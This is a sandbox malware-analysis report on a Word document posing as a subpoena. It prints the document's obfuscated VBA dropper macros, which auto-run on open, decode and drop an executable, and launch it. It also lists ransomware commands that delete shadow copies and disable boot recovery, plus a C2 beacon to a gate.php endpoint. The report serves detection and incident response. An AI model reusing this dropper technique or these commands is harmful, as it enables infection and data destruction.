universityalliance.com_subpoena.doc
This report is generated from a file or URL submitted to this webservice on June 14th 2016 17:38:12 (UTC) and action script Random desktop files
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v4.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware/Leak
- POSTs files to a webserver
- Ransomware
- Deletes volume snapshots (often used by Ransomware)
- Persistence
-
Injects into explorer
Spawns a lot of processes - Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 14
-
Anti-Detection/Stealthyness
-
Tries to suppress failures during boot (often used to hide system changes)
- details
- Tries to suppress failures during boot "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Tries to suppress failures during boot (often used to hide system changes)
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET TROJAN Trojan Generic - POST To gate.php with no referer" (SID: 2017930, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET TROJAN H1N1 Loader CnC Beacon M1" (SID: 2021139, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN H1N1 Loader CnC Beacon HTTP Header" (SID: 2820096, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
-
2/56 Antivirus vendors marked sample as malicious (3% detection rate)
1/42 Antivirus vendors marked sample as malicious (2% detection rate) - source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
The input sample dropped a file that was identified as malicious
- details
- 3/56 Antivirus vendors marked dropped file "contraire.exe" as malicious (classified as "Inject" with 5% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Disables startup repair
- details
- Disables startup repair "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Injects into explorer
- details
- Injected into "explorer.exe" (Show Process)
- source
- Monitored Target
- relevance
- 5/10
-
Disables startup repair
-
Ransomware/Banking
-
Deletes volume snapshots (often used by Ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Deletes volume snapshots (often used by Ransomware)
-
System Destruction
-
Deletes volume snapshots (often used by Ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Deletes volume snapshots (often used by Ransomware)
-
System Security
-
References security related windows services
- details
- "}2V]uAerRbfe=4_&"
- source
- File/Memory
- relevance
- 7/10
-
References security related windows services
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc"" (Show Process)
Spawned process "contraire.exe" (Show Process)
Spawned process "contraire.exe" (Show Process)
Spawned process "explorer.exe" (Show Process)
Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 12
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from PID 00003056
SetUnhandledExceptionFilter@KERNEL32.DLL from contraire.exe (PID: 3056) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from contraire.exe (PID: 3056) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from contraire.exe (PID: 3056) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from contraire.exe (PID: 3056) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from contraire.exe (PID: 3056) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Possibly tries to evade analysis by sleeping many times
- details
- "WINWORD.EXE" (Thread ID: 3032) slept "320" times (threshold: 300)
- source
- API Call
- relevance
- 10/10
-
Possibly tries to evade analysis by sleeping many times
-
General
-
Contains ability to find and load resources of a specific module
- details
- FindResourceA@KERNEL32.DLL from contraire.exe (PID: 3056) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
POSTs files to a webserver
- details
-
"POST /h/gate.php HTTP/1.1
Accept: */*
accept-Encoding: none
accept-Language: en-US.q=0.8
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ronwiruligh.com
Content-Length: 88
Connection: Keep-Alive
Cache-Control: no-cache" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Drops executable files
- details
- "contraire.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5C79E07-098D-4F1C-BB33-FE54500E580C}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB36534A-173A-47DB-88E9-562E23718A08}.tmp"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{66E23C84-5106-4022-BD40-5187D5099D76}.tmp" - source
- API Call
- relevance
- 7/10
-
Drops executable files
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "WScript.Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba90bf550068dcf57a62c3" to virtual address "0x0051842C"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba9c684d0068dcf57a62c3" to virtual address "0x0051840C"
"WINWORD.EXE" wrote bytes "4207f645" to virtual address "0x6B54CA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "ba8c552e04b98b7b7a62ffe1" to virtual address "0x004FFC42"
"WINWORD.EXE" wrote bytes "e99a5475f0" to virtual address "0x77513E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9c53224f2" to virtual address "0x75FD6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "ba7cfc2d04b98b7b7a62ffe1" to virtual address "0x004FFC2E"
"WINWORD.EXE" wrote bytes "ba74822e04b98b7b7a62ffe1" to virtual address "0x004FFC6A"
"WINWORD.EXE" wrote bytes "e9239978f0" to virtual address "0x77515DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "c4cade7580bbde7552bade759fbbde7508bbde7546cede756138df75de2fdf75d0d9de75000000001779ef764f91ef767f6fef76f4f7ef7611f7ef76f283ef76857eef7600000000" to virtual address "0x6B521000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "a2bdf145" to virtual address "0x6A39F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "79bd5845" to virtual address "0x2FC91B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "e9603376f0" to virtual address "0x77514731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba3cc0550068dcf57a62c3" to virtual address "0x004FF194"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba1c684d0068dcf57a62c3" to virtual address "0x005183EC"
"WINWORD.EXE" wrote bytes "782ff445" to virtual address "0x68E978E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "2094b945" to virtual address "0x67E90BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "ba74c45500b98b7b7a62ffe1" to virtual address "0x004FFC56"
"WINWORD.EXE" wrote bytes "7162b844" to virtual address "0x62EA9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e99e48e4f1" to virtual address "0x75DF3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 11
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetSystemTimeAsFileTime@KERNEL32.DLL from contraire.exe (PID: 3056) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
- "ronwiruligh.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "93.171.202.176:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub HeaderFooterProperty()
Dim MyText As String
MyText = "<Replace this with your text>"
ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader
Selection.HeaderFooter.Range.Text = "MyText"
ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument
End Sub
Sub PasteMethod()
Dim MyRange As Object
Set MyRange = Selection.Range
' Selection Example:
Selection.Paste
' Range Example:
MyRange.Collapse Direction:=wdCollapseStart
MyRange.Paste
End Sub
Public Sub AutoOpen()
Dim centerfield As String
Dim flowing As Long
Dim ruade As Integer
Dim subterminal As Integer
ruade = sin(5)
If ruade = 107 - 33 + 29234 Then
PasteMethod
Else
Dim angiogram As Integer
tabble = condylura.Tag
repudiate = 65 + 13 - 116 + 50
Select Case repudiate
Case 1 To 12
anaspid = Mid("chruchwardenfiargyroxiphium", 13, 2) + Lcase("BBInG")
Case 13
janissary = Lcase("al") & Lcase("b")
honeybee = "lo" & Right("rentieroted", 4)
Case 14
trisyllable = Mid("oblatebamycomycin", 7, 2) + Mid("derricknkrodollar", 8, 4) + "ll"
End Select
End If
End Sub"
File "trigonometrician.bas" (Streampath: "Macros/VBA/trigonometrician") has code: "Sub mesothelioma(hindshank, chopin)
Open hindshank For Binary Access Read Write As #chopin
End Sub
Sub deist(collocalia, handfast)
Dim estop As Integer
Set prosepct = collocalia
farmer = 19 - 90 + 72
If sin(farmer) <> 60 Then
microelectronic = Lcase("ru") & Lcase("n")
Else
microelectronic = "koine"
End If
tyranny = CallByName(prosepct, microelectronic, farmer, handfast)
End Sub
Function smokey()
If cos(62) > 54 Then
depict = Right("beguilementpr", 2) & "ocyo" & Lcase("n")
Else
Dim needfulness As Byte
Dim hilltop As Long
radyera = Lcase("SC") & Lcase("riPtiNG.")
propos = Right("cardinalfishFile", 4) + Mid("dagdaSystemObjectpectoral", 6, 12)
End If
If atn(85) > 68 Then
anarchically = StrReverse("ana") + Left("cyclusbouche", 6)
Else
myricales = radyera + propos
Dim neoteric As Byte
Set aflame = CreateObject(myricales)
concurring = 42 + 41 + 12 - 94
End If
smokey = CallByName(aflame, "GetSpecialFolder", concurring, 40 - 52 + 14)
End Function
Sub halfcentury()
megaloptera = "interview"
Dim deontology As String
If tan(62) > 56 Then
momentarily = Mid("cravenlanlankiness", 7, 3) + Mid("irreverentdscapablative", 11, 5) + "ist"
Else
Dim adulterous As String
deontology = smokey
Dim ance As Integer
End If
majeure = 66
Select Case majeure
Case 8 To 12
Dim homegrown As Long
Dim dysgenesis As Integer
undercover = Mid("fieldworkcococcinellidae", 10, 2) + Left("nchoidpatwin", 6)
Case 66
adulterous = deontology + "\" + Lcase("cO") + Left("ntraieolith", 5) + Left("re.exewinless", 6)
alcaid = Mid("acquirercheadvanced", 9, 3) + Right("bigamisteseca", 5) + Left("keliquidate", 2)
End Select
metrification = 59
Select Case metrification
Case 40 To 44
Dim steerer As Integer
Dim socinian As Variant
tyne = Left("agrobinia", 2) + Mid("bambusalaonnonradioactive", 8, 4) + Left("emamantrap", 3)
Case 59
ballade = FreeFile
End Select
confucian = 0
phoenicurus = confucian
mesothelioma adulterous, ballade
periploca = condylura.cynicism
mariolatry = periploca
gond = aeration(mariolatry)
Dim pilgrim As Long
If cos(33) > 71 Then
filler = "ne" & Mid("alphabeticallyreuslanguille", 15, 4)
Else
nonadmission = Len(gond)
Call trigonometrician.moehringia(gond, ballade, gond, periploca)
Close #ballade
Set jog = CreateObject("WScript.Shell")
End If
deist jog, adulterous
End Sub
Function aeration(comprised) As String
Dim fiduciary() As Byte
Dim baboonish(63) As Long
Dim auscultatory() As Byte
Dim contrasted As Integer
Dim fallacious(255) As Byte
Dim postmistress As Long
Dim headspace(63) As Long
Dim casern As Long
Dim breastwork As String
Dim morphophonemics As Long
Dim grossieret As Long
Dim plenus(63) As Long
shark = 26 + 107 - 71 + 65218
bombastic = 1 - 103 - 91 + 449
caracal = 64
membra = 38 - 14 - 105 + 16515153
bawd = 65536
shaktist = 258048
monetarism = 76 + 91 - 23 + 16711536
shapen = 93 + 3 + 108 + 51
anteposition = 125 - 35 - 72 + 4078
bakshish = 4032
adriatic = 262144
arawak = 75 - 12
Dim larger As Variant
Dim wormcast() As Byte
wormcast = StrConv(comprised, vbFromUnicode)
Dim molybdenite As Byte
For frameup = 0 To UBound(wormcast)
wormcast(frameup) = wormcast(frameup) Xor 17
Next frameup
afternoon = 42 - 35
Select Case afternoon
Case 1 To 4
uncomfortably = Ucase("Al") & Mid("diseaseloyenavarch", 8, 4) & Right("bylined", 1)
Case 5
nephrectomy = Lcase("mA") & Ucase("RTe")
consecate = "dia" + Mid("cagegnosticcalcimine", 5, 7)
Case 8
reparation = Ucase("Ti") + Mid("perfumerytaneavolation", 10, 4) + Left("ssactivism", 2)
archidiaconate = Ucase("SQU") + Right("paradisaeidaeeezers", 6)
End Select
stakeout = StrConv(wormcast, vbUnicode)
contrasted = 2
For morphophonemics = 0 To 255
Select Case morphophonemics
Case 65 To 90
fallacious(morphophonemics) = morphophonemics - 65
Case 97 To 122
fallacious(morphophonemics) = morphophonemics - 71
Case 48 To 57
fallacious(morphophonemics) = morphophonemics + 4
Case 43
fallacious(morphophonemics) = 62
Case 47
fallacious(morphophonemics) = 63
End Select
Next morphophonemics
For morphophonemics = 0 To 63
baboonish(morphophonemics) = morphophonemics * caracal
plenus(morphophonemics) = morphophonemics * anteposition
headspace(morphophonemics) = morphophonemics * adriatic
Next morphophonemics
fiduciary = StrConv(stakeout, vbFromUnicode)
numenius = 48 - 87 + 118 - 75
ReDim auscultatory((((UBound(fiduciary) + 1) \ numenius) * 3) - 1)
For casern = 0 To UBound(fiduciary) Step 4
grossieret = headspace(fallacious(fiduciary(casern))) + plenus(fallacious(fiduciary(casern + 1))) + _
baboonish(fallacious(fiduciary(casern + 2))) + fallacious(fiduciary(casern + 3))
morphophonemics = grossieret And monetarism
auscultatory(postmistress) = morphophonemics \ bawd
morphophonemics = grossieret And shark
auscultatory(postmistress + 1) = morphophonemics \ bombastic
auscultatory(postmistress + 2) = grossieret And shapen
postmistress = postmistress + 3
Next casern
breastwork = StrConv(auscultatory, vbUnicode)
If contrasted Then breastwork = Left$(breastwork, Len(breastwork) - contrasted)
aeration = breastwork
End Function
Sub SortText()
' A macro to sort the selected text, if the user has selected
' more than one paragraph
If Documents.Count > 0 Then
' The user has at least one document open.
If Selection.Paragraphs.Count > 1 Then
' The user has selected more than one paragraph
' of text, so sort it.
Selection.Sort
Else
' Tell the user what to do.
MsgBox "Please select two or more paragraphs and try again."
End If
End If
End Sub
Public Sub moehringia(argonaut, ByRef favillous, mythological, dyewood)
Dim alga As Variant
Dim ingression() As Byte
Dim briticism As Integer
ingression = StrConv(mythological, vbFromUnicode)
gleditsia = Right("workbasketmu", 2) + Mid("addlerderateles", 6, 4) + StrReverse("re")
atoll = favillous
Put #atoll, , ingression
End Sub
Sub HeaderFooterObject()
Dim MyText As String
MyHeaderText = "<Replace this with your text>"
MyFooterText = "<Replace this with your text>"
With ActiveDocument.Sections(1)
.Headers(wdHeaderFooterPrimary).Range.Text = MyHeaderText
.Footers(wdHeaderFooterPrimary).Range.Text = MyFooterText
End With
End Sub"
File "condylura.frm" (Streampath: "Macros/VBA/condylura") has code: "Sub UserForm_Initialize()
If sin(44) <> 37 Then
trigonometrician.halfcentury
End If
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DFCFA03069C9A3F7F8.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFBFD6C115F2267F85.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DFF0C0473C3F607E42.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF3BD2D38CC1D34C55.TMP"
"WINWORD.EXE" created file "%TEMP%\contraire.exe"
"WINWORD.EXE" created file "%TEMP%\~DFF38E54BBB980442D.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-60938"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-60938"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Launches a browser
- details
- Launches browser "firefox.exe" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 62E60000
- source
- Loaded Module
-
Spawns new processes
- details
-
Spawned process "contraire.exe" (Show Process)
Spawned process "explorer.exe" (Show Process)
Spawned process "firefox.exe" with commandline "-osint -url "%1"" (Show Process)
Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Jun 15 00:38:42 2016 mtime=Wed Jun 15 00:38:42 2016 atime=Wed Jun 15 00:38:46 2016 length=226304 window=hide"
"index.dat" has type "data"
"~WRS{F5C79E07-098D-4F1C-BB33-FE54500E580C}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"contraire.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"MSForms.exd" has type "data"
"~$Normal.dotm" has type "data"
"~$db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc" has type "data" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "7m\G ;^t_z9wIevvooh-+0C[?@]~\_~dH>7%s!Vj+n5.cA"
Heuristic match: "ronwiruligh.com" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
universityalliance.com_subpoena.doc
- Filename
- universityalliance.com_subpoena.doc
- Size
- 221KiB (226304 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Windows, Template: Normal.dot, Last Saved By: Windows, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jun 14 12:22:00 2016, Last Saved Time/Date: Tue Jun 14 12:27:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
- Architecture
- WINDOWS
- SHA256
- e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b
- MD5
- f33231cd5376a166e9f1574d65ab9f02
- SHA1
- 3f46464a88599a395d1742647cf24b302cc18174
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 8 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc"
(PID: 3152)
-
contraire.exe
(PID: 3056)
-
contraire.exe
(PID: 3436)
-
explorer.exe
(PID: 3204)
-
firefox.exe
-osint -url "%1"
(PID: 3276)
- vssadmin.exe delete shadows /all /quiet (PID: 3476)
- bcdedit.exe bcdedit /set {default} recoveryenabled no (PID: 2732)
- bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures (PID: 2812)
-
firefox.exe
-osint -url "%1"
(PID: 3276)
-
explorer.exe
(PID: 3204)
-
contraire.exe
(PID: 3436)
-
contraire.exe
(PID: 3056)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
ronwiruligh.com | 93.171.202.176 | - | Czech Republic |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
93.171.202.176 |
80
TCP |
- |
Czech Republic
ASN: 50245 (Serverel Corp.) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
93.171.202.176:80 (ronwiruligh.com) | POST | ronwiruligh.com/h/gate.php |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 93.171.202.176:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no referer | 2017930 |
local -> 93.171.202.176:80 (TCP) | A Network Trojan was detected | ET TROJAN H1N1 Loader CnC Beacon M1 | 2021139 |
local -> 93.171.202.176:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN H1N1 Loader CnC Beacon HTTP Header | 2820096 |
Extracted Strings
Extracted Files
-
Malicious 1
-
-
contraire.exe
- Size
- 66KiB (67072 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Inject" (3/56)
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 85469d7dc8eeabbfe6b28352bf799168
- SHA1
- 9d763b9d455f241ed5c627c737cc67f04a9d691e
- SHA256
- c97c65e249548a3eef5ea7e7ceaa11cba707f8f44603f1b0fcc8bbaca0dac6ca
-
-
Informative 6
-
-
e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jun 15 00:38:42 2016, mtime=Wed Jun 15 00:38:42 2016, atime=Wed Jun 15 00:38:46 2016, length=226304, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 73cc71d7bf866f0a0e81b7f8b1506952
- SHA1
- 6f0076cfe5284be9e9a9c241ef7d85e528bb4d36
- SHA256
- aa8fd21304f368ba726a59871aeb1d3192d2c92405c5871f66e662e728ecfdc9
-
index.dat
- Size
- 721B (721 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- f57e55bb32797902b01ef25b1fe0b208
- SHA1
- c6fe6829a7e071d4362ef1202e14c088a1d224e8
- SHA256
- 0cddc86d646759cbc738a42a20a5dd26e369a9759717cf5c234c81bfd18580ac
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 1ee8335a555cff009c2eb2d9e6da693f
- SHA1
- 2efcf68a7d709bd0bc38382f5eb0efb98fa2083e
- SHA256
- 99599c264c9f6d718ff7942d1b501b0f0a1dec77c7200dba0112344b2ac33fa7
-
~WRS{F5C79E07-098D-4F1C-BB33-FE54500E580C}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 441a87fc7ff15dcad4d875545b47d36a
- SHA1
- bf0c0386d9df565804a90871a6fae0b2fc5b577a
- SHA256
- dd8ce573c7783bd39c4f07ed40ff488e89a47ac912961839b14c5738cf92499a
-
~$db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3152)
- MD5
- 1ee8335a555cff009c2eb2d9e6da693f
- SHA1
- 2efcf68a7d709bd0bc38382f5eb0efb98fa2083e
- SHA256
